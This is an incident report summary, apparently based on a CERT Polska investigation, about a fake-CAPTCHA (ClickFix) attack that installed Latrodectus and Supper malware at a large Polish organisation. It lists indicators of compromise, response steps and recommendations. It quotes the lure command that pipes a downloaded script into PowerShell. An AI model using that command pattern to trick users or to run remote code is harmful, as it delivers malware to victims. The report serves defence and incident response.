Full Report
We assisted a large organisation in the investigation and remediation of a live malware infection caused by a successful Fake Captcha attack. In this report, we summarize our observations and publish an in-depth malware analysis.
Analysis Summary
# Incident Report: ClickFix Fake Captcha Leading to Latrodectus/Supper Malware
## Executive Summary
CERT Polska investigated a widespread malware infection within a large Polish organization triggered by a "Fake Captcha" (ClickFix) social engineering attack. The breach began with a single user executing a malicious script via the Windows Run command, resulting in the deployment of Latrodectus and "Supper" malware. The incident highlights how opportunistic social engineering can bypass traditional perimeter defenses to achieve company-wide compromise.
## Incident Details
- **Discovery Date:** Approximately late 2025 / early 2026 (Reported Feb 17, 2026)
- **Incident Date:** Late 2025
- **Affected Organization:** Not disclosed (Large Polish Organization)
- **Sector:** Not disclosed
- **Geography:** Poland
## Timeline of Events
### Initial Access
- **Date/Time:** Late 2025
- **Vector:** ClickFix (Fake CAPTCHA) Social Engineering.
- **Details:** A user visited a compromised website that displayed a fake CAPTCHA. To "verify," the user was instructed to press `Win+R`, paste a malicious command from the clipboard (`cmd /c curl [URL] | powershell`), and press Enter.
### Lateral Movement
- **Details:** Following initial infection with Latrodectus, the attackers deployed "Supper" malware. Supper includes SOCKS proxy capabilities and remote binary execution, which facilitated movement and persistent access across the network.
### Data Exfiltration/Impact
- **Details:** The primary impact was a live, company-wide malware infection. While specific data theft was not detailed, the "Supper" malware is historically associated with "pre-ransomware" activity, indicating the goal was likely long-term access and future encryption or large-scale theft.
### Detection & Response
- **How it was discovered:** Anomalous files were identified in `%APPDATA%\Intel` and `%APPDATA%\Local` during proactive monitoring or forensic review.
- **Response actions taken:** Cert Polska assisted law enforcement and the organization in forensic investigation, malware reverse engineering, and remediation of the live infection.
## Attack Methodology
- **Initial Access:** Social engineering via Fake CAPTCHA/ClickFix.
- **Persistence:** DLL Side-loading using legitimate Windows binaries (e.g., `igfxSDK.exe` loading a malicious `version.dll` or `wtsapi32.dll`).
- **Defense Evasion:** Use of legitimate signed binaries for side-loading; payloads hidden in `%APPDATA%` subdirectories; use of decoy C2 IP addresses (reversed byte order).
- **Lateral Movement:** Supper malware SOCKS5 proxy features.
- **Impact:** System compromise, potential precursor to ransomware.
## Impact Assessment
- **Financial:** High (investigation and remediation costs).
- **Data Breach:** Potential credential theft and unauthorized access via SOCKS proxy.
- **Operational:** Significant disruption due to the need for company-wide remediation.
- **Reputational:** High risk if the infection had transitioned to a ransomware event.
## Indicators of Compromise
### Network Indicators
- `naintn[.]com`
- `jzluw[.]com`
- `amazoncdn[.]com` (Spoofed/Subdomain)
- `162[.]19[.]199[.]110`
- `146[.]19[.]49[.]130`
- `185[.]233[.]166[.]27`
### File Indicators (Hashes)
- `b7f8750851e70ec755343d322d7d81ea0fc1b12d4a1ab6a60e7c8605df4cd6a5` (igfxSDK.exe)
- `be5bcdfc0dbe204001b071e8270bd6856ce6841c43338d8db914e045147b0e77` (wtsapi32.dll - Malicious)
- `2528df60e55f210a6396dd7740d76afe30d5e9e8684a5b8a02a63bdcb5041bfc` (245282244.dll)
## Response Actions
- **Containment:** Identified and blocked C2 IP addresses and malicious domains.
- **Eradication:** Cleaned `%APPDATA%` directories and terminated malicious processes associated with DLL side-loading.
- **Recovery:** Restored systems and enhanced monitoring for `Win+R` or PowerShell execution patterns originating from browser interactions.
## Lessons Learned
- **The "Human Firewall" is vulnerable:** Even sophisticated organizations can be compromised by a single user following "copy-paste" instructions.
- **Side-loading remains effective:** Attackers continue to use trusted Windows binaries to bypass basic EDR detections.
- **LLM Usage:** JavaScript found on the attack sites suggested the code might have been generated by an AI, leading to functional errors (short Telegram tokens) that aided discovery.
## Recommendations
1. **User Awareness:** Train employees to never use `Win+R` or paste content into command prompts at the request of a website.
2. **Technical Controls:** Restrict or monitor the use of `curl` and `PowerShell` in environments where they are not required for standard business operations.
3. **EDR/Monitoring:** Implement behavioral rules to detect the execution of commands directly from the clipboard or suspicious DLL side-loading in `%APPDATA%`.